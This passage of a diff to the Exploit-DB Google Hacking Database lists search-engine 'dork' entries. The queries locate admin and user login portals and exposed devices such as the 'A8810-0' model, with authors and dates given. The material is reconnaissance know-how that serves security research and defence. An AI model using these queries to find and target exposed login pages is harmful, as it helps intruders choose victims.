  <shortDescription>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</shortDescription>
  <textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;
 # Pages Containing Login Portals
 # Date:31/05/2023
 # Exploit Author: Ishak Hasan Sabbir</textualDescription>
  <query>Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</query>
  <querystring>https://www.google.com/search?q=Re: inurl:&quot;/admin&quot; intitle:&quot;adminlogin&quot;</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Ishak Hasan Sabbir</author>
 </entry>
 <entry>
  <id>8201</id>
  <link>https://www.exploit-db.com/ghdb/8201</link>
  <category>Pages Containing Login Portals</category>
  <shortDescription>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</shortDescription>
  <textualDescription># Google Dork: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;
 # Pages Containing Login Portals
 # Date:31/05/2023
 # Exploit Author: Ishak Hasan Sabbir</textualDescription>
  <query>Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</query>
  <querystring>https://www.google.com/search?q=Re: inurl:&quot;/user&quot; intitle:&quot;userlogin&quot;</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Ishak Hasan Sabbir</author>
 </entry>
 <entry>
  <id>5619</id>
  <link>https://www.exploit-db.com/ghdb/5619</link>
@ -100793,6 +100900,21 @@ Discovered By: Kevin Randall
  <date>2019-04-03</date>
  <author>Kevin Randall</author>
 </entry>
 <entry>
  <id>8199</id>
  <link>https://www.exploit-db.com/ghdb/8199</link>
  <category>Various Online Devices</category>
  <shortDescription>allintitle:&quot;A8810-0&quot;</shortDescription>
  <textualDescription># Google Dork: allintitle:&quot;A8810-0&quot;
 # Various Online Devices
 # Date:31/05/2023
 # Exploit Author: Thomas Heverin</textualDescription>
  <query>allintitle:&quot;A8810-0&quot;</query>
  <querystring>https://www.google.com/search?q=allintitle:&quot;A8810-0&quot;</querystring>
  <edb></edb>
  <date>2023-05-31</date>
  <author>Thomas Heverin</author>
 </entry>
 <entry>
  <id>1397</id>
  <link>https://www.exploit-db.com/ghdb/1397</link>